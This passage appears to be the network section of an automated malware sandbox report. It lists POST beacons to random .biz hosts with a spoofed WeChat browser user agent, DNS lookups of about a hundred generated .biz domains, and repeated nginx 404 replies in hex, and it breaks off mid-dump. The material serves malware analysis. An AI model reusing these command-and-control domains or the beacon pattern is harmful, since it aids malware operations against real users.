Source: global trafficHTTP traffic detected: POST /kt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ctmnxqregqafw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
Source: global trafficDNS traffic detected: DNS query: przvgke.biz
Source: global trafficDNS traffic detected: DNS query: zlenh.biz
Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
Source: global trafficDNS traffic detected: DNS query: deoci.biz
Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
Source: global trafficDNS traffic detected: DNS query: qaynky.biz
Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
Source: global trafficDNS traffic detected: DNS query: myups.biz
Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
Source: global trafficDNS traffic detected: DNS query: jpskm.biz
Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
Source: global trafficDNS traffic detected: DNS query: vyome.biz
Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
Source: global trafficDNS traffic detected: DNS query: esuzf.biz
Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
Source: global trafficDNS traffic detected: DNS query: brsua.biz
Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
Source: global trafficDNS traffic detected: DNS query: gcedd.biz
Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
Source: global trafficDNS traffic detected: DNS query: xccjj.biz
Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
Source: global trafficDNS traffic detected: DNS query: uaafd.biz
Source: global trafficDNS traffic detected: DNS query: eufxebus.biz
Source: global trafficDNS traffic detected: DNS query: pwlqfu.biz
Source: global trafficDNS traffic detected: DNS query: rrqafepng.biz
Source: global trafficDNS traffic detected: DNS query: ctdtgwag.biz
Source: global trafficDNS traffic detected: DNS query: tnevuluw.biz
Source: global trafficDNS traffic detected: DNS query: whjovd.biz
Source: global trafficDNS traffic detected: DNS query: gjogvvpsf.biz
Source: global trafficDNS traffic detected: DNS query: reczwga.biz
Source: global trafficDNS traffic detected: DNS query: bghjpy.biz
Source: global trafficDNS traffic detected: DNS query: damcprvgv.biz
Source: global trafficDNS traffic detected: DNS query: ocsvqjg.biz
Source: global trafficDNS traffic detected: DNS query: ywffr.biz
Source: global trafficDNS traffic detected: DNS query: ecxbwt.biz
Source: global trafficDNS traffic detected: DNS query: pectx.biz
Source: global trafficDNS traffic detected: DNS query: zyiexezl.biz
Source: global trafficDNS traffic detected: DNS query: banwyw.biz
Source: global trafficDNS traffic detected: DNS query: muapr.biz
Source: global trafficDNS traffic detected: DNS query: wxgzshna.biz
Source: global trafficDNS traffic detected: DNS query: zrlssa.biz
Source: global trafficDNS traffic detected: DNS query: jlqltsjvh.biz
Source: global trafficDNS traffic detected: DNS query: xyrgy.biz
Source: global trafficDNS traffic detected: DNS query: htwqzczce.biz
Source: global trafficDNS traffic detected: DNS query: kvbjaur.biz
Source: global trafficDNS traffic detected: DNS query: uphca.biz
Source: global trafficDNS traffic detected: DNS query: fjumtfnz.biz
Source: global trafficDNS traffic detected: DNS query: hlzfuyy.biz
Source: global trafficDNS traffic detected: DNS query: rffxu.biz
Source: global trafficDNS traffic detected: DNS query: cikivjto.biz
Source: global trafficDNS traffic detected: DNS query: qncdaagct.biz
Source: global trafficDNS traffic detected: DNS query: shpwbsrw.biz
Source: global trafficDNS traffic detected: DNS query: cjvgcl.biz
Source: global trafficDNS traffic detected: DNS query: neazudmrq.biz
Source: global trafficDNS traffic detected: DNS query: pgfsvwx.biz
Source: global trafficDNS traffic detected: DNS query: aatcwo.biz
Source: global trafficDNS traffic detected: DNS query: kcyvxytog.biz
Source: global trafficDNS traffic detected: DNS query: nwdnxrd.biz
Source: global trafficDNS traffic detected: DNS query: ereplfx.biz
Source: global trafficDNS traffic detected: DNS query: ptrim.biz
Source: global trafficDNS traffic detected: DNS query: znwbniskf.biz
Source: global trafficDNS traffic detected: DNS query: cpclnad.biz
Source: unknownHTTP traffic detected: POST /ea HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 800
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:50:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:50:53 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:51:02 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:51:02 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:51:02 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Mon, 28 Oct 2024 15:51:26 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:51:48 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 